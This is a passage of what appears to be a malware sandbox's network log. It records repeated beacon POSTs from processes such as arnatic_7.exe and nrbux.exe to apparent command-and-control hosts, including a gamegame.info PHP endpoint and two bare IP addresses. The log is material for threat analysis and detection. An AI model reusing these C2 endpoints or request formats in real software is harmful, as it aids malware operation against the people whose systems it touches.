Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
X-Frame-Options: SAMEORIGIN
cf-request-id: 0b07b255ce00001e5d212e8000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=XZjLU8XYzO38pqXBIk1jVSAxNa8OR3EEJDEfgYYm%2BQv8Zy1HwATj%2BFMJiOtwJK4NQ9%2BR2wdmaapoZPcKA0i5lIDG71314i9dVecv5KSFw6w4NahWTo3z%2FlR6rXFCvA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 66862002edf21e5d-MUC
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

POST http://iw.gamegame.info/report7.4.php
SystemNetworkService
Remote address: 104.21.21.221:80
Request
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
Content-Length: 278
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:22:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Chl-Bypass: 1
Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
X-Frame-Options: SAMEORIGIN
cf-request-id: 0b07b27db700001e61bb9c8000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=anjNrm58r91Ck0utKPc3Bb21ckZQzvqXbQARwfcbuoiBrv9AxTGPIw4ABT4P5FFhfcGwvZkyeuL1jqgkaV6RIAe4R%2FWHgWjQZlmm%2FOAgu%2Bj%2FR30RiXzcldwJ6U5TeA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 66862042b9d91e61-MUC
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

POST http://87.251.71.195:82/
arnatic_7.exe
Remote address: 87.251.71.195:82
Request
POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
Host: 87.251.71.195:82
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:23:08 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b2a5d200004be82a236000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=nAteczHbk%2BGqgLNkXQRZQ6Jz5ZbEd3%2B1h6jglXha%2B1nwytO8hGY8pjhvJu%2B6Nh4s96BNaOYJKNBXP20IQyb1j7k%2BoYRxX5GnQzuE1%2BQjg4xowZg3OwNBNFcc0fc%2Fyw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66862082e81e4be8-AMS
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:23:18 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b2ce210000164996af1000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=7s0xjmLU5CqUQA2ii2Ms8x9yVjKvk%2BanxoP5WztynECbmZvsxooi0gos3X%2B9RF3O%2BM98LTiL9OZhLvYZjjZgX9kji0qw5jaiDRQ33IKvCHjUhAn%2BePXwZaj1cWfU9A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668620c36f051649-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:23:29 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b2f83e00000575ed208000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=TZZsCGOeXpX187syVFsdHKnhGx9KzgrcGfXI7TeErgMiSNI4b2LrfeQBTIIrwzkRnZYDkaOs1a2KtzOPIFG6X9ZPLxMJgiglaL5YgBac0BehvaEF%2FApuT7tJGjkEcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66862106cce10575-LAX
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:23:40 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b321010000fa4449a3f000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=0t0e1dfZLOOmLAjAQJclDApZdbgwyioiITx96YHXcfKlhMDLYxpDON9hUc7vwQHY97eDjY5EwmFJ9MHkW9hmfWMytyQfxPYShzCZW%2F9%2B4hMhVnK6mtKYt505VD%2Bilg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668621480944fa44-AMS
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:23:41 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:23:50 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b348c60000cae4ed8f5000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=aO%2FAF78H87Z7B0Taa0BcfE6%2Flg3TH3HxdK1ikYnO9Ad9fdUKCv%2B4wZAVsK8uC3lpsVwS2AgMhpF2QsCYYJK2TOADf5th%2BE9zIJCR7JAQx6U2nRkzTEIQqtDZONI05A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66862187abbdcae4-ARN
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:24:00 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b370a7000016498cb43000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=4F6lRxUzI8IgVgFEENSLp2Z1tueQrYOpFrO%2BzFaOZIVnqzxWAWVnq1vwXy8SpA6o8B3N4ikEeaqABWCsIT2B7wQt0tQebtO%2BnRhipKpTzttcX4DTE2aSiJiVabDs8g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668621c778c31649-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:24:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Chl-Bypass: 1
Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
X-Frame-Options: SAMEORIGIN
cf-request-id: 0b07b398d500001bbddf821000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=epk3Z7WwIRQyfFCQfI3nOk%2BeOCq%2FWxU1KvrEXt4QBQ7R0n562JdZgCwZm%2B%2FSPxKPinvkknj1nNUS5l%2Brpi36fAeMXhYjp0JmTa%2FXZCqsjW8TKbcVmTrsqeBE9h5yow%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 66862207bb231bbd-MUC
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
• flag-unknown
POST
http://iw.gamegame.info/report7.4.php
SystemNetworkService
Remote address:
104.21.21.221:80
Request
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
Content-Length: 278
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:24:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Chl-Bypass: 1
Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
X-Frame-Options: SAMEORIGIN
cf-request-id: 0b07b3c0d100007cfa49a75000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=34lKJ9lbZVX96xlnHClEiMC3JxgU60%2FcxbvG5ojkrMq9e4LLVkO%2FWkRgJrGDLJ6mMv6jBIgOYXDai%2F1XCCEYi3uR2eE9EgNuDRDaoYD6WLyEvwsVRnJRbfwq0KybsQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 66862247889d7cfa-MUC
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
• flag-unknown
POST
http://87.251.71.195:82/
arnatic_7.exe
Remote address:
87.251.71.195:82
Request
POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
Host: 87.251.71.195:82
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
• flag-unknown
POST
http://iw.gamegame.info/report7.4.php
SystemNetworkService
Remote address:
104.21.21.221:80
Request
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
Content-Length: 278
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:24:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Chl-Bypass: 1
Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
X-Frame-Options: SAMEORIGIN
cf-request-id: 0b07b3e95b00006259fa3a7000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=kTAbYmJacvNSBFp3Cq8RQ3CTGXpN%2FV3esbkJ%2B1U2ZD%2Bvupku%2BybqtETMVFc8plRkZ7pv9KRr6eEjIkbXjbUIFATw92zAPYg%2Bt3U6gkjCfreEBLLsH2bQVEo8l1NTgA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 668622889d906259-OTP
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
• flag-unknown
POST
http://iw.gamegame.info/report7.4.php
SystemNetworkService
Remote address:
104.21.21.221:80
Request
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
Content-Length: 278
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:24:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Chl-Bypass: 1
Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
X-Frame-Options: SAMEORIGIN
cf-request-id: 0b07b414940000f015a694c000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Hds93MBvJTXHKKxJ7%2FmhvnQK5D33ZD5XGi8wI%2Fz1wMosN%2F4w22P0D2Br8y1zvsDoa2gCN9%2BFuFnZsJKO4tQXk30F%2F5kgwE7ERb%2BTS60M0saENZYIO2l7cLiDRugFeA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 668622cdbe46f015-EWR
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
• flag-unknown
POST
http://185.215.113.55/t5BnOoke2/index.php
nrbux.exe
Remote address:
